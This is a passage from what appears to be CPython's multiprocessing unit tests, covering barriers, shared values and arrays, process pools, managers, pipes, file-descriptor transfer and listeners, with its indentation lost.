(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(1000)))
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=53)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
raise AssertionError('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
